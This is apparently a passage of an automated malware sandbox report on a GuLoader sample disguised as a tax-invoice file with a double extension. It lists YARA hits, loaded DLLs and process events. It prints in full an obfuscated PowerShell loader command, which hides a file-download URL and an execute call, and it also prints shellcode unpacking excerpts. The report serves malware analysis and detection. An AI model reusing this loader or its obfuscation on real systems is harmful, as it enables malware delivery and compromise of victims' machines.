              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32}\InprocServer32 source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2777282940.0000000007DC0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Inter", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Dilemmaet $uddrivning $Noget218), (Sumass @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:binrformens = [AppDomain]::CurrentDomain.GetAssemblies()$global:O
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Noninhabitancies)), $Frerhusene).DefineDynamicModule($Erythrodextrin, $false).DefineType($Slutakkorder, $grnsetilfldes, [System.Multic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Tysklandskortene)$global:hyperdelicacy = [System.Text.Encoding]::ASCII.GetString($Afvises)$global:Esthesiography=$hyperdelicacy.substring($hanerne,$Whitewashes)<#Effulgent Precalcula
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84860CFE8 push esp; retf 2_2_00007FF84860CFE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8486000BD pushad ; iretd 2_2_00007FF8486000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029F8D2F push 2B6C708Bh; retf 4_2_029F94F5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029F8D70 push 2B6C708Bh; retf 4_2_029F94F5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0878181D push ebx; retf 4_2_08781823
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087848A9 pushfd ; iretd 4_2_087848BC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087829F5 push ebx; ret 4_2_08782A53
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08782A05 push ebx; ret 4_2_08782A53
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08782CF1 push ebx; iretd 4_2_08782CF2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08780F4D push esp; ret 4_2_08780F4E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08783243 push ebx; iretd 4_2_0878325E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0878423E pushfd ; iretd 4_2_08784240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08781229 push ebx; iretd 4_2_0878122A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08780379 push ebx; retf 4_2_0878037A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0878439E push edx; iretd 4_2_087843A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08783471 push ebx; iretd 4_2_08783472
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0878242E push ss; ret 4_2_0878242F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0878054D push ebx; retf 4_2_0878054E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_087805FA push edx; retf 4_2_087805FB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08780586 push es; iretd 4_2_08780587
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C729F5 push ebx; ret 8_2_03C72A53
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C705FA push edx; retf 8_2_03C705FB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C70586 push es; iretd 8_2_03C70587
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C7439E push edx; iretd 8_2_03C743A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C7054D push ebx; retf 8_2_03C7054E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C70F4D push esp; ret 8_2_03C70F4E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C70379 push ebx; retf 8_2_03C7037A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C72CF1 push ebx; iretd 8_2_03C72CF2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C748A9 pushfd ; iretd 8_2_03C748BC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C73243 push ebx; iretd 8_2_03C7325E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03C73471 push ebx; iretd 8_2_03C73472

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: html.vbsStatic PE information: NTS_eTaxInvoice.html.vbs
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
